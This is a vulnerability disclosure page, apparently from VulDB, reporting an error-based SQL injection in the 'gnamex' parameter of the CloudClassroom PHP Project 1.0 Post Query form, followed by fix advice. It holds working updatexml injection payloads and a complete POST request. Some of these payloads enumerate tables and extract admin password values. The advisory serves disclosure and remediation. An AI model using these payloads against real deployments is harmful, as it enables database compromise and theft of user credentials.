제출 #744236: https://github.com/mathurvishal/CloudClassroom-PHP-Project CloudClassroom PHP Project 1.0 SQL Injection정보

제목https://github.com/mathurvishal/CloudClassroom-PHP-Project CloudClassroom PHP Project 1.0 SQL Injection
설명CLOUD-CLASSROOMS-php-1.0 PoC - Sql Injection Erro Based Presentation: Security vulnerability: SQL Injection Vulnerability Type: Injection Affected Component: Post Query functionality (postquerypublic) Software: CloudClassroom PHP Project Version: 1.0 (discontinued). Business area: Education / e-Learning Platforms Describe the bug/issue: A SQL Injection vulnerability exists in the Post Query feature of the CloudClassroom PHP Project. The vulnerable parameter is gnamex (sent via POST), and the backend directly concatenates user input into SQL statements without proper sanitization or parameterized queries. This allows an attacker to inject arbitrary SQL commands, enabling: Extraction of sensitive information (user credentials, exam results, etc.) Enumeration of databases, tables, and columns Potential compromise of the entire application and underlying database Evidence of Vulnerability: The vulnerable endpoint: http:///CloudClassroom-PHP-Project-master/postquerypublic Vulnerable parameter: POST: gnamex Original SQL code (from source): $sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')"; Because the input is not sanitized, attackers can inject SQL like: a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1 Steps to Reproduce: Open the Post Query form at: http:///CloudClassroom-PHP-Project-master/postquerypublic Intercept the request (e.g., with Burp Suite) or craft a manual POST: POST /CloudClassroom-PHP-Project-master/postquerypublic Content-Type: application/x-www-form-urlencoded gnamex=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1&[email protected]&squeryx=test&update=Post Query! Observe the response returning: XPATH syntax error: 'cc_db' Which reveals the current database name. Impact: Attackers can enumerate tables: a' AND updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),0x7e),1) AND '1'='1 Extract sensitive data (e.g., usernames, hashed passwords from admin table): a' AND updatexml(1,concat(0x7e,(SELECT Apass FROM admin LIMIT 0,1),0x7e),1) AND '1'='1 Severity: High (CVSS 7.5) because it allows full database compromise. Expected behavior: The application should use parameterized queries (prepared statements) to handle user input securely, preventing any SQL code injection. Bug Fix Recommendation: Implement prepared statements in PHP using mysqli or PDO. Use input validation and escaping. Apply least privilege principle on the database user. References: CWE-89: SQL Injection OWASP SQL Injection Prevention Cheat Sheet Additional context: Using blacklist-based filtering is not reliable. Attackers can bypass such filters easily by using encoding tricks, inline comments, or alternate syntax. We can identify SQL injection by adding a single quote to the search.
원천⚠️ https://github.com/carlosalbertotuma/CLOUD-CLASSROOMS-php-1.0
사용자
 bl4dsc4n (UID 94778)
제출2026. 01. 22. PM 01:24 (3 개월 ago)
모더레이션2026. 02. 06. AM 07:31 (15 days later)
상태수락
VulDB 항목344618 [mathurvishal CloudClassroom-PHP-Project 까지 5dadec098bfbbf3300d60c3494db3fb95b66e7be Post Query Details Page /postquerypublic.php gnamex SQL 주입]
포인트들20

Interested in the pricing of exploits?

See the underground prices here!